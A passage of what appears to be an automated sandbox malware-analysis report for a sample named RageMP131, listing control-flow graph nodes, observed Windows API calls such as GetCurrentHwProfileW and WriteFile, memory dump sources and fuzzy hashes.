                                  control_flow_graph 81 3b4623-3b4633 82 3b464d-3b464f 81->82 83 3b4635-3b4648 call 3ad22c call 3ad23f 81->83 84 3b498f-3b499c call 3ad22c call 3ad23f 82->84 85 3b4655-3b465b 82->85 101 3b49a7 83->101 104 3b49a2 call 3a47a0 84->104 85->84 87 3b4661-3b468a 85->87 87->84 90 3b4690-3b4699 87->90 93 3b469b-3b46ae call 3ad22c call 3ad23f 90->93 94 3b46b3-3b46b5 90->94 93->104 99 3b498b-3b498d 94->99 100 3b46bb-3b46bf 94->100 102 3b49aa-3b49ad 99->102 100->99 105 3b46c5-3b46c9 100->105 101->102 104->101 105->93 108 3b46cb-3b46e2 105->108 110 3b4717-3b471d 108->110 111 3b46e4-3b46e7 108->111 112 3b471f-3b4726 110->112 113 3b46f1-3b4708 call 3ad22c call 3ad23f call 3a47a0 110->113 114 3b46e9-3b46ef 111->114 115 3b470d-3b4715 111->115 117 3b472a-3b4748 call 3b6e2d call 3b6db3 * 2 112->117 118 3b4728 112->118 142 3b48c2 113->142 114->113 114->115 116 3b478a-3b47a9 115->116 121 3b47af-3b47bb 116->121 122 3b4865-3b486e call 3c0d44 116->122 147 3b474a-3b4760 call 3ad23f call 3ad22c 117->147 148 3b4765-3b4788 call 3ae13d 117->148 118->117 121->122 126 3b47c1-3b47c3 121->126 133 3b48df 122->133 134 3b4870-3b4882 122->134 126->122 130 3b47c9-3b47ea 126->130 130->122 135 3b47ec-3b4802 130->135 139 3b48e3-3b48f9 ReadFile 133->139 134->133 138 3b4884-3b4893 134->138 135->122 140 3b4804-3b4806 135->140 138->133 157 3b4895-3b4899 138->157 143 3b48fb-3b4901 139->143 144 3b4957-3b4962 139->144 140->122 145 3b4808-3b482b 140->145 149 3b48c5-3b48cf call 3b6db3 142->149 143->144 151 3b4903 143->151 165 3b497b-3b497e 144->165 166 3b4964-3b4976 call 3ad23f call 3ad22c 144->166 145->122 152 3b482d-3b4843 145->152 147->142 148->116 149->102 159 3b4906-3b4918 151->159 152->122 153 3b4845-3b4847 152->153 153->122 160 3b4849-3b4860 153->160 157->139 164 3b489b-3b48b3 157->164 159->149 167 3b491a-3b491e 159->167 160->122 185 3b48b5-3b48ba 164->185 186 3b48d4-3b48dd 164->186 168 3b48bb-3b48c1 call 3ad1e5 165->168 169 3b4984-3b4986 165->169 166->142 172 3b4920-3b4930 call 3b4335 167->172 173 3b4937-3b4944 167->173 168->142 169->149 189 3b4933-3b4935 172->189 175 3b4950-3b4955 call 3b417b 173->175 176 3b4946 call 3b448c 173->176 190 3b494b-3b494e 175->190 176->190 185->168 186->159 189->149 190->189
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 00000007.00000002.4145584611.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4146167296.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147267330.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147847240.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4148165343.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 79504544eb9453dba6312337a5fa147f30054e394b6233fe122bc66c4724efc7
                                  • Instruction ID: da14436355e68fc8b4143af12857a8153149df9fe92b224816b7d50e76981203
                                  • Opcode Fuzzy Hash: 79504544eb9453dba6312337a5fa147f30054e394b6233fe122bc66c4724efc7
                                  • Instruction Fuzzy Hash: 82B11170A04249AFDB13DFA8D841BFEBBB5EF46308F154158E641ABA83C7719D41CB68

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 228 2ca210-2ca2ab call 39f290 call 2c2ae0 233 2ca2b0-2ca2bb 228->233 233->233 234 2ca2bd-2ca2c8 233->234 235 2ca2cd-2ca2de call 3a5362 234->235 236 2ca2ca 234->236 239 2ca2e0-2ca305 call 3a9136 call 3a4eeb call 3a9136 235->239 240 2ca351-2ca357 235->240 236->235 257 2ca30c-2ca316 239->257 258 2ca307 239->258 241 2ca359-2ca365 240->241 242 2ca381-2ca393 240->242 244 2ca377-2ca37e call 39f511 241->244 245 2ca367-2ca375 241->245 244->242 245->244 247 2ca394-2ca3ae call 3a47b0 245->247 256 2ca3b0-2ca3bb 247->256 256->256 259 2ca3bd-2ca3c8 256->259 260 2ca328-2ca32f call 32cf60 257->260 261 2ca318-2ca31c 257->261 258->257 262 2ca3cd-2ca3df call 3a5362 259->262 263 2ca3ca 259->263 268 2ca334-2ca33a 260->268 264 2ca31e 261->264 265 2ca320-2ca326 261->265 272 2ca3fc-2ca403 262->272 273 2ca3e1-2ca3f9 call 3a9136 call 3a4eeb call 3a8be8 262->273 263->262 264->265 265->268 270 2ca33c 268->270 271 2ca33e-2ca349 call 3adbdf call 3a8be8 268->271 270->271 289 2ca34e 271->289 275 2ca42d-2ca433 272->275 276 2ca405-2ca411 272->276 273->272 279 2ca423-2ca42a call 39f511 276->279 280 2ca413-2ca421 276->280 279->275 280->279 283 2ca434-2ca45e call 3a47b0 280->283 295 2ca46f-2ca474 283->295 296 2ca460-2ca464 283->296 289->240 296->295 297 2ca466-2ca46e 296->297
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 00000007.00000002.4145584611.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4146167296.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147267330.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147847240.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4148165343.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __fread_nolock
                                  • String ID:
                                  • API String ID: 2638373210-0
                                  • Opcode ID: 12be30bbab5b9742c08f96a78177a5330c361607c5c209745953888d19f400a9
                                  • Instruction ID: 41dfdf3f8dc952150cb8320164db988f2eaff2855e3ba57d8abd100d89177555
                                  • Opcode Fuzzy Hash: 12be30bbab5b9742c08f96a78177a5330c361607c5c209745953888d19f400a9
                                  • Instruction Fuzzy Hash: 21716870910248AFDB19DF68DC49FAFB7E8EF42304F10866DF8099B282D7B59941C792

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 298 3b549c-3b54be 299 3b56b1 298->299 300 3b54c4-3b54c6 298->300 303 3b56b3-3b56b7 299->303 301 3b54c8-3b54e7 call 3a4723 300->301 302 3b54f2-3b5515 300->302 309 3b54ea-3b54ed 301->309 305 3b551b-3b5521 302->305 306 3b5517-3b5519 302->306 305->301 308 3b5523-3b5534 305->308 306->305 306->308 310 3b5547-3b5557 call 3b4fe1 308->310 311 3b5536-3b5544 call 3ae17d 308->311 309->303 316 3b5559-3b555f 310->316 317 3b55a0-3b55b2 310->317 311->310 320 3b5588-3b559e call 3b4bb2 316->320 321 3b5561-3b5564 316->321 318 3b5609-3b5629 WriteFile 317->318 319 3b55b4-3b55ba 317->319 326 3b562b-3b5631 318->326 327 3b5634 318->327 322 3b55bc-3b55bf 319->322 323 3b55f5-3b5607 call 3b505e 319->323 344 3b5581-3b5583 320->344 324 3b556f-3b557e call 3b4f79 321->324 325 3b5566-3b5569 321->325 330 3b55e1-3b55f3 call 3b5222 322->330 331 3b55c1-3b55c4 322->331 349 3b55dc-3b55df 323->349 324->344 325->324 332 3b5649-3b564c 325->332 326->327 329 3b5637-3b5642 327->329 336 3b56ac-3b56af 329->336 337 3b5644-3b5647 329->337 330->349 338 3b55ca-3b55d7 call 3b5139 331->338 339 3b564f-3b5651 331->339 332->339 336->303 337->332 338->349 346 3b567f-3b568b 339->346 347 3b5653-3b5658 339->347 344->329 352 3b568d-3b5693 346->352 353 3b5695-3b56a7 346->353 350 3b565a-3b566c 347->350 351 3b5671-3b567a call 3ad208 347->351 349->344 350->309 351->309 352->299 352->353 353->309
                                  APIs
                                  • WriteFile.KERNELBASE(?,00000000,003A9087,?,00000000,00000000,00000000,?,00000000,?,002CA3EB,003A9087,00000000,002CA3EB,?,?), ref: 003B5621
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 00000007.00000002.4145584611.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4146167296.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147267330.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147847240.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4148165343.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileWrite
                                  • String ID:
                                  • API String ID: 3934441357-0
                                  • Opcode ID: fdff6189ff75fb097df4227b5174733eadd6494a1a850bdaf4c7fc12d5dcfadc
                                  • Instruction ID: ebd295c15b8830ab3da7d54180cef05ae6cd90172642c05e5a346491e97c205f
                                  • Opcode Fuzzy Hash: fdff6189ff75fb097df4227b5174733eadd6494a1a850bdaf4c7fc12d5dcfadc
                                  • Instruction Fuzzy Hash: 0161C371D00519AFDF12DFA8C884FFEBBBAAF59308F150145EA40AB655D372D901CBA0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 356 50e09cf-50e09d1 357 50e09d3-50e0a30 356->357 358 50e0a31-50e0a3e 356->358 360 50e0a41-50e0b0b 357->360 358->360 373 50e0b1c-50e0b39 GetCurrentHwProfileW 360->373 375 50e0b4e-50e0c0b call 50e0c23 373->375 385 50e0c0b call 50e0c23 375->385
                                  APIs
                                  • GetCurrentHwProfileW.ADVAPI32(?), ref: 050E0B2B
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4154003797.00000000050E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_50e0000_RageMP131.jbxd
                                  Similarity
                                  • API ID: CurrentProfile
                                  • String ID:
                                  • API String ID: 2104809126-0
                                  • Opcode ID: 64a7917ddad0f100956176b2ab94be277aa8e10f9f679d11a6cb5f03ef60c03c
                                  • Instruction ID: f0d22bc79cdbbe5fd081de6eb386e0c18d8c5e707b15e26e6b77f91278bb1566
                                  • Opcode Fuzzy Hash: 64a7917ddad0f100956176b2ab94be277aa8e10f9f679d11a6cb5f03ef60c03c
                                  • Instruction Fuzzy Hash: E2215CEB64D119BCA212C1423B79EFE676FE6D67347388477F407D6506D2C40A8A5131

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 387 330560-33057f 388 330585-330598 387->388 389 3306a9 call 2c2270 387->389 390 3305c0-3305c8 388->390 391 33059a 388->391 394 3306ae call 2c21d0 389->394 395 3305d1-3305d5 390->395 396 3305ca-3305cf 390->396 393 33059c-3305a1 391->393 399 3305a4-3305a5 call 39f290 393->399 404 3306b3-3306b8 call 3a47b0 394->404 397 3305d7 395->397 398 3305d9-3305e1 395->398 396->393 397->398 401 3305e3-3305e8 398->401 402 3305f0-3305f2 398->402 408 3305aa-3305af 399->408 401->394 405 3305ee 401->405 406 330601 402->406 407 3305f4-3305ff call 39f290 402->407 405->399 412 330603-330629 406->412 407->412 408->404 413 3305b5-3305be 408->413 415 330680-3306a6 call 3a0f70 call 3a14f0 412->415 416 33062b-330655 call 3a0f70 call 3a14f0 412->416 413->412 425 330657-330665 416->425 426 330669-33067d call 39f511 416->426 425->404 427 330667 425->427 427->426
                                  APIs
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 003306AE
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 00000007.00000002.4145584611.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4146167296.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147267330.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147847240.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4148165343.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Concurrency::cancel_current_task
                                  • String ID:
                                  • API String ID: 118556049-0
                                  • Opcode ID: 318ca63d53af118050337d2617cc9b2857a3311d5737a2fcb3013cc935154a5b
                                  • Instruction ID: ecc22976a83301610031e09e5ea3c49feecf00cf758957440164320a3e431bee
                                  • Opcode Fuzzy Hash: 318ca63d53af118050337d2617cc9b2857a3311d5737a2fcb3013cc935154a5b
                                  • Instruction Fuzzy Hash: 6B41F672A041149FCB1ADF68D99166E7BA9EF89310F150269FC05EB305D770DD608BE1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 430 50e09fc-50e0b0b 445 50e0b1c-50e0b39 GetCurrentHwProfileW 430->445 447 50e0b4e-50e0c0b call 50e0c23 445->447 457 50e0c0b call 50e0c23 447->457
                                  APIs
                                  • GetCurrentHwProfileW.ADVAPI32(?), ref: 050E0B2B
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4154003797.00000000050E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_50e0000_RageMP131.jbxd
                                  Similarity
                                  • API ID: CurrentProfile
                                  • String ID:
                                  • API String ID: 2104809126-0
                                  • Opcode ID: ae824611690113cb59a1cc160dd9d717098bca4d9c36d2b101fdafa774a98689
                                  • Instruction ID: f167204bc76cc7979a6704c920ea9acbf39e99af9c80af919b73fc7d385912c0
                                  • Opcode Fuzzy Hash: ae824611690113cb59a1cc160dd9d717098bca4d9c36d2b101fdafa774a98689
                                  • Instruction Fuzzy Hash: B021D2F660D11ABCA212C5563F79EFF67AFE2DA7307348426F41BE2505D2D40A895131

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 459 50e0a1a-50e0a2b 460 50e0a2d-50e0a57 459->460 461 50e0a58-50e0b0b 459->461 460->461 473 50e0b1c-50e0b39 GetCurrentHwProfileW 461->473 475 50e0b4e-50e0c0b call 50e0c23 473->475 485 50e0c0b call 50e0c23 475->485
                                  APIs
                                  • GetCurrentHwProfileW.ADVAPI32(?), ref: 050E0B2B
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4154003797.00000000050E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_50e0000_RageMP131.jbxd
                                  Similarity
                                  • API ID: CurrentProfile
                                  • String ID:
                                  • API String ID: 2104809126-0
                                  • Opcode ID: f2beb40197afe89dfcf694164d2830f6279d91baa277692c26a0652adb381580
                                  • Instruction ID: 6bb80c44da85540918fbe0aba0eb70b6e642813859b5f54cdfa7be20859f8164
                                  • Opcode Fuzzy Hash: f2beb40197afe89dfcf694164d2830f6279d91baa277692c26a0652adb381580
                                  • Instruction Fuzzy Hash: 0021B4F764D02ABCA252C1453B79EFE67AFF6DA7307388466B40BE6605D2C40B8A5131

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 519 50e0a4f-50e0b0b 530 50e0b1c-50e0b39 GetCurrentHwProfileW 519->530 532 50e0b4e-50e0c0b call 50e0c23 530->532 542 50e0c0b call 50e0c23 532->542
                                  APIs
                                  • GetCurrentHwProfileW.ADVAPI32(?), ref: 050E0B2B
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4154003797.00000000050E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_50e0000_RageMP131.jbxd
                                  Similarity
                                  • API ID: CurrentProfile
                                  • String ID:
                                  • API String ID: 2104809126-0
                                  • Opcode ID: b5ee4ac652893e5a480f04d0878758f0b983dd488556854cf6734d58ebfeb6bb
                                  • Instruction ID: 020da0c64580eb75e77b8ad5caaf9d950563348cf9bc3b38b7f8fe525a2c2829
                                  • Opcode Fuzzy Hash: b5ee4ac652893e5a480f04d0878758f0b983dd488556854cf6734d58ebfeb6bb
                                  • Instruction Fuzzy Hash: 0C11C1B760D12AECA202C1463F79EFF67AFE6DA7307348466B407D2615D3C40A896531

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 544 50e0ae6-50e0b0b 549 50e0b1c-50e0b39 GetCurrentHwProfileW 544->549 551 50e0b4e-50e0c0b call 50e0c23 549->551 561 50e0c0b call 50e0c23 551->561
                                  APIs
                                  • GetCurrentHwProfileW.ADVAPI32(?), ref: 050E0B2B
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4154003797.00000000050E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_50e0000_RageMP131.jbxd
                                  Similarity
                                  • API ID: CurrentProfile
                                  • String ID:
                                  • API String ID: 2104809126-0
                                  • Opcode ID: 253d284f5e7ad1ba7c4e40768836b8ca58217698409c8adc3972b20ffbbde7e9
                                  • Instruction ID: cbb71d9be3f6e77996f78a02a8b26a9e4bae30a9b3516111b58cfbcf5cb068d4
                                  • Opcode Fuzzy Hash: 253d284f5e7ad1ba7c4e40768836b8ca58217698409c8adc3972b20ffbbde7e9
                                  • Instruction Fuzzy Hash: F21138E620C111ADF602C2153F7DEFE6BAFE6DA334334446BF447D6606D6C40A8A9131

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 563 50e0a7d-50e0b0b 571 50e0b1c-50e0b39 GetCurrentHwProfileW 563->571 573 50e0b4e-50e0c0b call 50e0c23 571->573 583 50e0c0b call 50e0c23 573->583
                                  APIs
                                  • GetCurrentHwProfileW.ADVAPI32(?), ref: 050E0B2B
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4154003797.00000000050E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_50e0000_RageMP131.jbxd
                                  Similarity
                                  • API ID: CurrentProfile
                                  • String ID:
                                  • API String ID: 2104809126-0
                                  • Opcode ID: ca7c5d443b08a6344d779bf14eed227cc752d1111630e253dc0c475cede90eeb
                                  • Instruction ID: d2d4837acc834e8ae8cdf7ab3ab8cd432010b104a4e539bee307f901fcfba5cc
                                  • Opcode Fuzzy Hash: ca7c5d443b08a6344d779bf14eed227cc752d1111630e253dc0c475cede90eeb
                                  • Instruction Fuzzy Hash: 8E11CEF620C029BCA202C1463F79EFF67AFE2D97347348466F80BE2905D3D40A895931
                                  APIs
                                  • GetCurrentHwProfileW.ADVAPI32(?), ref: 050E0B2B
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4154003797.00000000050E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_50e0000_RageMP131.jbxd
                                  Similarity
                                  • API ID: CurrentProfile
                                  • String ID:
                                  • API String ID: 2104809126-0
                                  • Opcode ID: 952af7b05a7b3907a40854ec090494ea7503195e5a7d87d59c7d2bdc4b0b37d7
                                  • Instruction ID: 4309c0869a8da916158d47be8aac5363ce4510bda8b76cb77f1c678acafdd212
                                  • Opcode Fuzzy Hash: 952af7b05a7b3907a40854ec090494ea7503195e5a7d87d59c7d2bdc4b0b37d7
                                  • Instruction Fuzzy Hash: FE11C2F664C211BDA202C2653F38EFFAB6FE6DA7347348866B407E6116D2D40A895132
                                  APIs
                                  • GetCurrentHwProfileW.ADVAPI32(?), ref: 050E0B2B
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4154003797.00000000050E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_50e0000_RageMP131.jbxd
                                  Similarity
                                  • API ID: CurrentProfile
                                  • String ID:
                                  • API String ID: 2104809126-0
                                  • Opcode ID: d5922c3c0ec478ed5b8321fbc172d937d71b89600f0798ce33fceb514478cb8a
                                  • Instruction ID: b6da9da81ff17ba95b0e825112ede1a327bccf69c91efea1776350671b5ff48e
                                  • Opcode Fuzzy Hash: d5922c3c0ec478ed5b8321fbc172d937d71b89600f0798ce33fceb514478cb8a
                                  • Instruction Fuzzy Hash: E711A1F620C126BCA202C6463F78EFF676FF6D97347348866B40BE2505D7D40A895631
                                  APIs
                                  • GetCurrentHwProfileW.ADVAPI32(?), ref: 050E0B2B
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4154003797.00000000050E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_50e0000_RageMP131.jbxd
                                  Similarity
                                  • API ID: CurrentProfile
                                  • String ID:
                                  • API String ID: 2104809126-0
                                  • Opcode ID: 99a4536b5182f1130127e567bd952c91547f2c8366efa3fe2b27cd61431193af
                                  • Instruction ID: 4997ad1cdfab122b26ec7f1b89f0b60feccb9da9da15505f5eb07ade9723e1bc
                                  • Opcode Fuzzy Hash: 99a4536b5182f1130127e567bd952c91547f2c8366efa3fe2b27cd61431193af
                                  • Instruction Fuzzy Hash: 6A11A1F620C115ADA216C6153E78EFFA76FE6D5734330882AF44BE1605D7D40A895531
                                  APIs
                                  • GetCurrentHwProfileW.ADVAPI32(?), ref: 050E0B2B
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4154003797.00000000050E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_50e0000_RageMP131.jbxd
                                  Similarity
                                  • API ID: CurrentProfile
                                  • String ID:
                                  • API String ID: 2104809126-0
                                  • Opcode ID: 361d5849515e16f1c3b34d3e13012c28ddcf3e035943824c96cceae8bc6a5a24
                                  • Instruction ID: b654026fde555b948323d0f9118ecde96fa84ac3e07d808d475c5ee57b3f3c1c
                                  • Opcode Fuzzy Hash: 361d5849515e16f1c3b34d3e13012c28ddcf3e035943824c96cceae8bc6a5a24
                                  • Instruction Fuzzy Hash: F3018CE264C022BCB506C1257E78EFF67AFF6C5738730882BF04BD2615E6D51A899532
                                  APIs
                                  • GetCurrentHwProfileW.ADVAPI32(?), ref: 050E0B2B
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4154003797.00000000050E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_50e0000_RageMP131.jbxd
                                  Similarity
                                  • API ID: CurrentProfile
                                  • String ID:
                                  • API String ID: 2104809126-0
                                  • Opcode ID: 4b9df61f9f190ab86be6429b37f093ec9258c4ab6d3856c66afe0b40042a085f
                                  • Instruction ID: 13dc2d13e384560ff96630083670a0206122e042a92bd3107211552e3fa3cb22
                                  • Opcode Fuzzy Hash: 4b9df61f9f190ab86be6429b37f093ec9258c4ab6d3856c66afe0b40042a085f
                                  • Instruction Fuzzy Hash: 8B018FE660C111ADB602C2553F34EFF6B6EE6D5B30730886BF407D2519D2944E895172
                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,003B49F9,00000000,CF830579,003F1140,0000000C,003B4AB5,003A8BBD,?), ref: 003B4B68
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 00000007.00000002.4145584611.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4146167296.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147267330.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147847240.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4148165343.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  • Opcode ID: fff2aa4a1c9f725e6408a5bada54437f282138d253e7aaf41bee23da29bafd97
                                  • Instruction ID: 42c73e7d8de935b33e7e9d2b65723dee775c54ed73c20c87ccfbab07185c2276
                                  • Opcode Fuzzy Hash: fff2aa4a1c9f725e6408a5bada54437f282138d253e7aaf41bee23da29bafd97
                                  • Instruction Fuzzy Hash: 63114C32A4051416CA27A2746805BFE5B498BC277CF2B0209FB889BDC3EE60DC41429D
                                  APIs
                                  • SetFilePointerEx.KERNELBASE(00000000,00000000,003F0DF8,002CA3EB,00000002,002CA3EB,00000000,?,?,?,003AE166,00000000,?,002CA3EB,00000002,003F0DF8), ref: 003AE098
                                  Memory Dump Source
